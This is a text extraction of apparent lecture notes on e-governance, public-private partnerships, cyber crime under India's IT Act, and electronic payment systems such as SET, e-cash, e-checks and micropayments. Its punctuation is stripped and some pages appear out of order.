integration of various stand-alone systems and services between government-to-customer (G2C)
government-to-business (G2B) government-to-government (G2G) as well as back office
processes and interactions within the entire government framework Through e-governance
government services will be made available to citizens in a convenient efficient and transparent
manner The three main target groups that can be distinguished in governance concepts are
government citizens and businessesinterest groups In e-governance there are no distinct
boundaries
Generally four basic models are available ndash government-to-citizen (customer) government-to-
employees government-to-government andgovernment-to-business
Difference between E-Government and E-Governance ndash
Both the terms are treated to be the same however there is some difference between the two
E-government is the use of the ICTs in public administration - combined with organizational
change and new skills - to improve public services and democratic processes and to strengthen
support to public The problem in this definition to be congruence definition of e-governance is
that there is no provision for governance of ICTs As a matter of fact the governance of ICTs
requires most probably a substantial increase in regulation and policy-making capabilities with
all the expertise and opinion-shaping processes among the various social stakeholders of these
PREPARED BY ARUN PRATAP SINGH 43
43
concerns So the perspective of the e-governance is the use of the technologies that both help
governing and have to be governed The Public-Private Partnership (PPP) based e-governance
projects are hugely successful in India United Telecoms Limited known as UTL is a major player
in India on PPP based e-governance projects Each project had mammoth state wide area
networks in these states
E-governance is the future many countries are looking forward to for a corruption-free
government E-government is one-way communication protocol whereas e-governance is two-
way communication protocol The essence of e-governance is to reach the beneficiary and ensure
that the services intended to reach the desired individual has been met with There should be an
auto-response to support the essence of e-governance whereby the Government realizes the
efficacy of its governance E-governance is by the governed for the governed and of the
governed
Establishing the identity of the end beneficiary is a challenge in all citizen-centric services
Statistical information published by governments and world bodies does not always reveal the
facts The best form of e-governance cuts down on unwanted interference of too many layers
while delivering governmental services It depends on good infrastructural setup with the support
of local processes and parameters for governments to reach their citizens or end
beneficiaries Budget for planning development and growth can be derived from well laid out e-
governance systems
Why e-Governance
E-Government can transform citizen service provide access to information to empower citizens
enable their participation in government and enhance citizen economic and social opportunities
so that they can make better lives for themselves and for the next generation
BASIC ARCHITECTURE
PREPARED BY ARUN PRATAP SINGH 44
44
A suggested architecture for e-Governance is shown in the diagram where it is illustrated that
Applications from various departments can be integrated together so as to be accessed by any
terminal or computer from any other department or anywhere through the network This is
because of the characteristics of CORBA - it is location transparent language independent
implementation independent architecture and Operating System independent The applications
connected through CORBAIIOP could be legacy applications wrapped around to suit CORBA
specifications or any new Web application or could be even a data base environment using
Oracle etc Seamless interconnection and thereby effective utility of the entire system of e-
Governance is possible if the middleware is designed to have the necessary services like
Transactions Data Base Management Messaging and Naming
Regarding security aspects CORBA Security standard is built around existing security
specifications such as Distributed Computing Environment (DCE) the Kerberos Protocol and
Generic Security Service (GSS) API While these technologies are heavily weighted Public Key
Security with Secured Socket Layer (SSL) is popular with Internet based transactions
Types of Interactions in e-Governance
e-Governance facilitates interaction between different stake holders in governance These interactions may be described as follows
G2G (Government to Government)
In this case Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities This kind of interaction is only within the sphere of government and can be both horizontal ie between different government agencies as well as between different functional areas within an organization or vertical ie between national provincial and local government agencies as well as between different levels within an organization The primary objective is to increase efficiency performance and output
PREPARED BY ARUN PRATAP SINGH 45
45
G2C (Government to Citizens)
In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other It gives citizens the choice of when to interact with the government (eg 24 hours a day 7 days a week) from where to interact with the government (eg service centre unattended kiosk or from onersquos homeworkplace) and how to interact with the government (eg through internet fax telephone email face-to-face etc) The primary purpose is to make government citizen-friendly
G2B (Government to Business)
Here e-Governance tools are used to aid the business community ndash providers of goods and services ndash to seamlessly interact with the government The objective is to cut red tape save time reduce operational costs and to create a more transparent business environment when dealing with the government The G2Binitiatives can be transactional such as in licensing permits procurement and revenue collection They can also be promotional and facilitative such as in trade tourism and investment These measures help to provide a congenial environment to businesses to enable them to perform more efficiently
G2E (Government to Employees) Government is by far the biggest employer and like any organization it has to interact with
its employees on a regular basis This interaction is a two-way process between the
organization and the employee Use of ICT tools helps in making these interactions fast
and efficient on the one hand and increase satisfaction levels of employees on the other
Difference between G2B and B2G
Government to business (G2B)- Refers to the conducting of transactions between
government bodies and business via internet
Business to government (B2G)- Professional affairs conducted between companies and
regional municipal or federal governing bodies B2G typically encompasses the
determination and evaluation of proposal and completion of contract
PUBLIC PRIVATE PARTNERSHIPS
bull Agreement between Government and the Private Sector for the Provision of a Public
Good or Service by the Latter
bull Generally but not always involving
ndash Long Term Contracts
ndash User Charges andor Payments flowing between the Parties
ndash Shared Investments but Mainly Private
PREPARED BY ARUN PRATAP SINGH 46
46
ndash Risk Sharing by the Parties
bull Must be a Partnership
A public-private partnership exists when public sector agencies (federal state or local) join with
private sector entities (companies foundations academic institutions or citizens) and enter into a
business relationship to attain a commonly shared goal that also achieves objectives of the
individual partners
Why do them
bull Fiscal Head Room
bull As a Way of Financing the Project
bull Separate Policy amp Regulation from Operations
PREPARED BY ARUN PRATAP SINGH 47
47
bull Make the Good or Service Available
bull Pay for Performance and Output
bull Introduce Competition ndash For and In the Market
PREPARED BY ARUN PRATAP SINGH 48
48
The Need to Set the Right Priorities ndash
Four Basic Dimensions of P3
Although each is unique all P3rsquos include four basic characteristics
Shared goals
Shared resources (time money expertise people)
Shared risks
Shared benefits
Benefits
Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital
Two Major Steps
PREPARED BY ARUN PRATAP SINGH 49
49
Crafting the Partnership
Implementing the Partnership
Project Management -
Six Distinct Phases
Genesis
Whatrsquos the need
Whatrsquos driving the need rationale
Facility non-compliance natural disaster budget deficit
Is there a need for a PublicPrivate Partnership
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 18
18
How the merchant and the payment gateway can verify the DS
bull The merchant is provided with OI H[PI] and DS
bull The dual signature can be verified as follows
Step 1 The merchant first finds
H[ H[PI] || H[OI] ]
Step 2 He then decrypts the digital signature with the cardholderrsquos public signature key as
follows
DRSA[ DS | keypublic_sign cardholder ]
Where
keypublic_sign cardholder public signature key of the cardholder
PREPARED BY ARUN PRATAP SINGH 19
19
Step 3 Finally he compares the two terms H[H[PI] || H[OI]] and
DRSA[DS | keypublic_signcardholder ]
They should be the same if the transmitted DS has not been changed otherwise the order is
not valid
The payment gateway is provided with PI H[OI] and DS
By using the dual signature method each cardholder can link OI and PI while releasing
only the necessary information to the relevant party
If either the OI or PI is changed the dual signature will no longer be valid
DIGITAL ENVELOPE ndash
PREPARED BY ARUN PRATAP SINGH 20
20
SET PROTOCOL ndash
SET protocol has four phases initiation purchase authorization and capture
First the cardholder sends a purchase initiation request to the merchant for initializing
the payment
Then the merchant returns a response message to the cardholder
In the second phase the cardholder sends the purchase order together with the
payment instruction to the merchant
In the third phase the merchant obtains the authorization from the issuer via the
payment gateway
Finally the merchant requests a money transfer to its account
E-CASH
Electronic money is paperless cash This money is either stored on a card itself or in an account
associated with the card
The most common examples are transit cards meal plans and PayPal E-Cash can also mean
any kind of electronic payment
Electronic payment systems come in many forms including virtual cheques ATM cards credit
cards and stored value cards The usual security features for such systems are privacy
authenticity and no repudiation
There are four major components in an electronic cash system
Issuers
Customers
Merchants or traders
Regulators
Issuers can be banks or non-bank institutions
PREPARED BY ARUN PRATAP SINGH 21
21
customers are referred to users who spend E-Cash
Merchants and traders are vendors who receive E-Cash
regulators are defined as related authorities or state tax agencies
For an E-Cash transaction to occur we need to go through at least three stages
Account Setup Customers will need to obtain E-Cash accounts through certain issuers
Merchants who would like to accept E-Cash will also need to arrange accounts from
various E-Cash issuers Issuers typically handle accounting for customers and
merchants
Purchase Customers purchase certain goods or services and give the merchants
tokens which represent equivalent E-Cash Purchase information is usually encrypted
when transmitting in the networks
Authentication Merchants will need to contact E-Cash issuers about the purchase and
the amount of E-Cash involved E-Cash issuers will then authenticate the transaction
and approve the amount E-Cash involved
E-cash payment system ndash
For accessing the services online e-cash is a prime method for secure online payments
The following model shows how e cash payment system works
PREPARED BY ARUN PRATAP SINGH 22
22
This is a simple model of E-cash payment system This gives us the idea of how e-cash
payment system works The model is explained properly in upcoming slides
The customer approaches his issuer(bankrsquos) site for accessing his account The issuer in return
issues the money in form of a token which is generally in form of tens and hundreds or as per
specified by the customer
In second phase the customer will endorse those tokens to the merchant for acquiring services
for which the customer will authenticate the payment for the trader
PREPARED BY ARUN PRATAP SINGH 23
23
In third phase the trader will approach the token issuer(customerrsquos bank) and after
authenticating the tokens the issuing bank will convert the tokens into electronic fund and the
same will be transferred into traderrsquos account
Finally after getting the payment for the respective services the trader provides the requisite
service or product and also notifies the customer about the approval of payment made by
customer in traderrsquos account
A system that allows a person to pay for goods or services by transmitting a number
from one computer to another
Like the serial numbers on real currency notes the E-cash numbers are unique
This is issued by a bank and represents a specified sum of real money
PREPARED BY ARUN PRATAP SINGH 24
24
It is anonymous and reusable
Electronic Cash Security
Complex cryptographic algorithms prevent double spending
Anonymity is preserved unless double spending is attempted
Serial numbers can allow tracing to prevent money laundering
E-Cash Processing
E-cash security
Security is of extreme importance while handling the online transactions Faith in the security of
the medium of exchange whether paper or digital is essential for the economy to function
E-cash is much secure than other online payment modes because in this case no credential such
as card-passwords or anything such is involved Its like simply the online fund transfer from
customerrsquos account to traderrsquos account
PREPARED BY ARUN PRATAP SINGH 25
25
However while accessing the customerrsquos account the customer must keep in mind the internet
security sweep or theft The online hacking and cracking can be avoided by using SSL and TSL
website security systems and keeping the website link with safe ldquoHttps ldquo protocols and proper
internet security softwares to keep aside the threats of malware evasdrooping and other security
threats
Advantages
We can transfer funds purchase stocks and offer a variety of other services without
having to handle physical cash or cheques
Electronic cash protects its user against theft With electronic cash the customer does
not need to provide financial information
E-cash supports small payments Other online payment system charge a fee for every
transaction no matter how much high or low it is but e-cash has a specific limit for
additional charges thatrsquos why very low payments are not charged a fee
Limitations
Maybe how much secure the e-cash payment system is but still no one is safe against
the online frauds In this case the trader is referred as fraudulent The trader may take
the amount but may not provide the services
While making the payment its very important that the internet connection and power
supply should be active If the payment is in process and internet supply fails in between
it can lead to loss of information ie amount will be charged but it wont reach to trader
and the refund takes very long time in general the refund time is at least 30-45 days
E-Cash is not for everyone Low income segments without computer and internet access
are unable to enjoy the usage of E-Cash
The rise of E-Cash is inevitable but further improvements are needed Tackling security
anonymity low income group readiness and technology reliability issues will make E-Cash more
perfect In countries such as India where people were hesitant to use such methods has shown
a tremendous use of online payments and E-cash payment system Slowly but steadily the growth
is seen and improving it technologically will make it more reliable and efficient for customers to
use it
PREPARED BY ARUN PRATAP SINGH 26
26
E-CHECK
What is an electronic check
Itrsquos simply an electronic version of a paper check When you convert a traditional check into an electronic payment you can process it through the Automated Clearing House (ACH) Network to save time and moneymdashand because electronic checks have more security features than a paper check they better protect your business and customers Another way to think of an electronic check is when a customer pays by entering in their bank account information online and electronically sending the money Electronic checks are becoming increasingly popular because they are so fast efficient and secure Electronic checks are sometimes called eChecks electronic check conversions or Back Office Conversions (BOCs) Read more on what you need to know as you consider using eChecks in your business
eCheck a new payment instrument combining the security speed and processing efficiencies of
all-electronic transactions with the familiar and well-developed legal infrastructure and business
processes associated with paper checks is the first and only electronic payment mechanism
chosen by the United States Treasury to make high-value payments over the public Internet
How electronic checks work
The process is simple First you run a customerrsquos paper check through an electronic scanner system supplied by your merchant service provider This virtual terminal captures the customers banking information and the payment amount The information is then transferred electronically over the Federal Reserve Banks ACH Network which takes the funds from your customers account and deposits them into yours After payment approval the virtual terminal will print a receipt for the customer to sign and keep Your employee should then void the paper check and return it to the customer Yoursquoll be able to view and report on your merchant transactions online although features may vary depending on your merchant service provider or your payment processing solution provider
How does the ACH Network work with eChecks
The ACH Network is a funds distribution system that moves funds electronically from one entity to another Itrsquos a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed) Given its ability to electronically transfer money directly to and from bank accounts ACH is a faster payment method than traditional paper checks The ACH payment process is close to the paper check process only faster Clients give their bank routing or checking account number and after verification the payment is transferred quite immediately electronically through the ACH system Besides checks the ACH Network also handles debit card transactions direct deposits of payroll Social Security and other government benefits direct debit payments and business-to-business payments
PREPARED BY ARUN PRATAP SINGH 27
27
Reaping the benefits of eChecks
Converting your customersrsquo paper checks into electronic checks helps save time and reduces hassle for your staff because you can submit payments electronically instead of making trips to the bank However time saving and hassle reduction are not the only benefits Read on for more 1 Reduce processing costs by up to 60 eChecks require less manpower to process and donrsquot come with any deposit or transaction fees As a result processing an eCheck is generally much cheaper than processing a paper check or credit card transaction 2 Receive funds sooner Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing Billing companies often receive payments within one day 3 Increase sales If your business doesnrsquot accept paper checks offering eChecks expands your customersrsquo options and can increase sales If yoursquore converting from paper checks to eChecks you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud 4 Work smarter and greener Electronic check conversion is easy to set up It relies on the trusted ACH Network And eChecks help reduce the more than 674 million gallons of fuel used and 36 million tons of greenhouse gas emissions created by transporting paper checks 5 Decrease errors and fraud eChecks reduce the potential for errors and fraud because fewer people handle them Merchant service providers also maintain monitor and check files against negative account databases that store information about individuals or companies that have records of fraud
Protecting your businessmdashand your customers
Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features 1 Authentication Merchants must verify that the person providing the checking account information has the authority to use that account Authentication services and products available to merchants include digital signatures and public key cryptography Also known as digital certificates digital signatures encrypt data in a way that gives the receiver a more reliable indication that the information was actually sent by the sender Theyrsquore used on the Internet to confirm the identity of a customer much as a handwritten signature would Because digital signatures are difficult to tamper with or imitate and are easily transportable theyrsquore a good way to verify identity Digital signatures are often used to implement electronic signatures which include any electronic data that carries the intent of a signature Public key cryptography is a security method that uses keys to encrypt and decrypt a sent message With electronic check conversion the private key is a secret mathematical calculation used to create the digital signature on the echeck and the public key is the key given to anyone
PREPARED BY ARUN PRATAP SINGH 28
28
who needs to verify that the sender signed the echeck and that the electronic transfer has not been tampered with 2 Duplicate detection Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks 3 Encryption The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL) How to get started with electronic checks
Herersquos how to implement electronic check conversion as quickly and easily as possible 1 Choose a well-established processing company Good pricing is important but working with a reliable processor is essential 2 Notify your customers that your business will begin using electronic check conversion Federal laws require you to post a notification about this change and give your customers a takeaway copy You must also provide customers with a phone number to request more information 3 Look for a processor that makes it easy to align your current business processes with your new electronic processing system export customer data and integrate your new system with your business management software 4 QuickBooks Payments offers a complete payment processing solution Businesses can take payments from their customers in many ways- from ACH bank payments electronic checks to credit cards including Visa MasterCard Discover and American Express In addition to offering many ways to get paid QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button Our data shows us that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature
This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service
1 Payer (customerbill payer) is prompted to authorize electronic debit enter bank routing number (ABA) and account number
PREPARED BY ARUN PRATAP SINGH 29
29
2 Merchants sales system securely transfers order information to CyberSource over the Internet
3 CyberSource forwards bank routing number and account number to processor 4 The routing number and account number are validated and the integrity of the accounts
checking history is verified Processor forwards approvedecline results to CyberSource 5 CyberSource returns approvaldecline message to merchant 6 If approved CyberSource routes check for settlement through a processer to the
Automated Clearinghouse System (ACH) Funds are deposited in approximately 1-3 business days
Four Different Scenarios of the FSTC E-check System ndash
PREPARED BY ARUN PRATAP SINGH 30
30
MICROPAYMENT METHODS
Traditional payment methods are called macropayment methods A new type of payment method known as micropayment method is emerging to cater for
very low value transactions Example
Millicent (pre-paymentcredit based) Paywords (post-payment)
PREPARED BY ARUN PRATAP SINGH 31
31
MICRO PAYMENT IS -
Very small payments made over the Web Transactions too small for credit cards Can be as little as a fraction of a cent Alternative to subscription and advertising Can go in either direction
A micropayment is an e-commerce transaction involving a very small sum of money in exchange
for something made available online such as an application download a service or Web-based
content
Micropayments are sometimes defined as anything less than 75 cents and can be as low as a
fraction of a cent A special type of system is required for such payments which are too small to
be feasible for processing through credit card companies
Heres one scheme for micropayment The user and seller each establish an account with a third-
party service provider who monitors collects and distributes micropayments The seller encodes
per-fee links inside a Web page When the user initiates a transaction payment goes through an
Internet wallet account managed by the service provider Micropayments accumulate until they
are collected as single larger payments Such a system is helpful when a user wants to make
PREPARED BY ARUN PRATAP SINGH 32
32
one-time micropayments to multiple sellers Seller-based accounts are more common for repeat
business with an individual enterprise
Once a common micropayment standard has been established some experts predict that
streaming media sites music and application downloads content vendors sports access sites
and other specialized resources will make pay-per-use common online
Advantages and risks ndash
With a micropayment system many small transactions are summarised over a defined period of
time and charged in one bill For that reason micropayments are applicable for businesses where
even small costs for every single transaction would be inefficient 4) The main benefits from the
customer site in using micropayment are speed and flexibility From the merchantsrsquo site speed
and acceptable transaction fees are very important As the transactions involve small capital
security does not have the highest priority Much more important than trust is security User and
merchants are more likely to use an insecure payment system from a trusted company than a
